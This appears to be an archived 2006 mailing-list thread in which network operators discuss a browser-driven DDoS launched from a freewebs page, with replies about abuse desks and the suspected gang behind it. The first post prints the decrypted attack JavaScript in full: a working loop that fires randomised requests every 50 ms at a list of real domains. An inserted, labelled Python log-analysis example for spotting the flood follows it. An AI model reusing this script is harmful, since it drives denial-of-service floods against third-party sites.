Ongoing DDoS helped by non-responsive abuse desks
Hi,

One of our web servers got hammered by ~5K req/s for hours from browsers with the following referer: http://www.freewebs.com/ihatespammers/nospam.html

Both freewebs.com and their network provider Cogent have been contacted without any visible result, even if the script is very effective (no filtering slows it down, but redirecting to an https with an invalid cert eventually messes the attackers' browser).

Given that the source is still up (and has been updated since yesterday), I wonder what one can expect by contacting each concerned domain host.

The decrypted jscript is:

    var target=new Array();
    target[0]="http://weerona.com/ph/order.php?%rand%"
    target[1]="http://fabutons.info/aw/001/?%rand%"
    target[2]="http://movi96.dayaugusta.com/aspx/search.asp?t=%rand%"
    target[3]="http://www.fakeidonline.com/store.php?%rand%"
    target[4]="http://ccebak.bestti.info/p/?%rand%"
    target[5]="http://www.zpgo.net/pweb7/texpo/?%rand%"
    target[6]="http://www.tex-win.com/productshow.asp?id=1808&%rand%=%rand%"
    target[7]="http://7eklp9g3.tagsully.net/p/?%rand%&zz=lowcost"
    //target[5]="http://zzizuyxxqquzjphyn.logomarz.com/counter.php?%rand%"
    //target[6]="http://svbcrwevktdbxf.logomarz.com/counter.php?%rand%"
    //target[7]="http://fqnbywsqfghz.logomarz.com/counter.php?%rand%"
    //target[8]="http://fvguwwnemlpgkd.logomarz.com/counter.php?%rand%"
    //target[9]="http://www.logodentity.com/ordernow.php?%rand%"
    //target[10]="http://www.clearlogo.com/ordernow.php?plan=1&%rand%=%rand%"
    //target[11]="http://www.heartysouvenirs.info/?page=shoppingcart&%rand%=%rand%"
    //target[9]="http://www.webpromotionnow.com/?%rand%"
    // Do not edit below this line
    var arrcount = 0;
    var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    function doddos(){
      // 8-character random token, substituted for %rand% so every URL is unique
      var randomstring = '';
      for (var i=0; i<8; i++) {
        var rnum = Math.floor(Math.random() * chars.length);
        randomstring += chars.substring(rnum,rnum+1);
      }
      if (arrcount > (target.length - 1)){
        arrcount = 0;
      }
      // each visiting browser issues one image fetch every 50 ms, cycling through the list
      var dimg = new Image;
      dimg.src=target[arrcount].replace(/\%rand\%/g,randomstring);
      arrcount++;
      setTimeout("doddos()",50);
    }
    setTimeout("doddos()",50);
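As an added defender-side example (not code from the original thread), a small Python access-log check that flags requests carrying the referer named above or the script's 8-character random query token, and reports peak flagged requests per log second plus the top source addresses. The sample log lines are constructed for the example.

```python
import re
from collections import Counter

# Referer the thread reports on the flood traffic.
ATTACK_REFERER = "http://www.freewebs.com/ihatespammers/nospam.html"

# Combined log format: ip ident user [time] "method path proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# The posted script replaces %rand% with 8 chars from [0-9A-Za-z]: a bare "XXXXXXXX"
# parameter or an "XXXXXXXX=XXXXXXXX" pair; match both shapes inside the query string.
RAND_RE = re.compile(r"(?:^|&)([0-9A-Za-z]{8})(?:=\1)?(?:&|$)")

def parse_line(line):
    # One combined-format line -> dict of fields, or None if it does not parse.
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def attack_reasons(rec):
    # Set of indicators a parsed record matches: "referer" and/or "rand-query".
    reasons = set()
    if rec["referer"] == ATTACK_REFERER:
        reasons.add("referer")
    query = rec["path"].partition("?")[2]
    if query and RAND_RE.search(query):
        reasons.add("rand-query")
    return reasons

def analyze(log_text):
    # Count flagged requests, peak flagged requests per log second, and top sources.
    per_second, sources, flagged, total = Counter(), Counter(), 0, 0
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        total += 1
        if attack_reasons(rec):
            flagged += 1
            per_second[rec["time"]] += 1
            sources[rec["ip"]] += 1
    return {"total": total, "flagged": flagged,
            "peak_per_second": max(per_second.values(), default=0),
            "top_sources": sources.most_common(3)}

# Constructed sample log (not from the original post): three flood hits in one second, two benign.
SAMPLE_LOG = """\
10.0.0.1 - - [23/Mar/2006:15:54:01 +0000] "GET /ph/order.php?aB3xQ9zk HTTP/1.1" 200 512 "http://www.freewebs.com/ihatespammers/nospam.html" "Mozilla/4.0"
10.0.0.2 - - [23/Mar/2006:15:54:01 +0000] "GET /productshow.asp?id=1808&Zq7LmN2p=Zq7LmN2p HTTP/1.1" 200 512 "http://www.freewebs.com/ihatespammers/nospam.html" "Mozilla/4.0"
10.0.0.1 - - [23/Mar/2006:15:54:01 +0000] "GET /p/?kT0vW8sD&zz=lowcost HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.3 - - [23/Mar/2006:15:54:02 +0000] "GET /store.php?category=5 HTTP/1.1" 200 512 "http://example.com/" "Mozilla/4.0"
10.0.0.4 - - [23/Mar/2006:15:54:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
"""
```

The random-token check catches hits whose referer was stripped (third sample line), which the referer match alone would miss.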
On Mar 23, 2006, at 7:54 AM, Martin Lathoud wrote:

> Hi,
> One of our web servers got hammered by ~5K req/s for hours from browsers with the following referer:
> [snip]
> target[0]="http://weerona.com/ph/order.php?%rand%"
> target[1]="http://fabutons.info/aw/001/?%rand%"
> target[2]="http://movi96.dayaugusta.com/aspx/search.asp?t=%rand%"
> target[3]="http://www.fakeidonline.com/store.php?%rand%"
> target[4]="http://ccebak.bestti.info/p/?%rand%"
> target[5]="http://www.zpgo.net/pweb7/texpo/?%rand%"
> target[6]="http://www.tex-win.com/productshow.asp?id=1808&%rand%=%rand%"
> target[7]="http://7eklp9g3.tagsully.net/p/?%rand%&zz=lowcost"

Which of these is your website?

Cheers,
Steve
2006/3/23, Steve Atkins <steve@blighty.com>:

> [snip]
> target[0]="http://weerona.com/ph/order.php?%rand%"
> target[1]="http://fabutons.info/aw/001/?%rand%"
> target[2]="http://movi96.dayaugusta.com/aspx/search.asp?t=%rand%"
> target[3]="http://www.fakeidonline.com/store.php?%rand%"
> target[4]="http://ccebak.bestti.info/p/?%rand%"
> target[5]="http://www.zpgo.net/pweb7/texpo/?%rand%"
> target[6]="http://www.tex-win.com/productshow.asp?id=1808&%rand%=%rand%"
> target[7]="http://7eklp9g3.tagsully.net/p/?%rand%&zz=lowcost"
>
> Which of these is your website?

None, they change A records of these rogue domains as they see fit to spread the attack among more victims.
On 23 Mar 2006, at 16:54, Martin Lathoud wrote:

> One of our web servers got hammered by ~5K req/s for hours from browsers with the following referer: http://www.freewebs.com/ihatespammers/nospam.html
> Both freewebs.com and their network provider Cogent have been contacted without any visible result

I found freewebs very responsive, I emailed them and they shut the site down instantly.

It's likely the originators of the DDOS are the Yambo gang out of Ukraine. Other hosts involved in this attack are located on Chinese IPs we know to be under the control of Yambo... http://www.spamhaus.org/rokso/listing.lasso?-op=cn&spammer=Yambo%20Financials

Steve Linford
The Spamhaus Project
http://www.spamhaus.org
Participants (3):
- Martin Lathoud
- Steve Atkins
- Steve Linford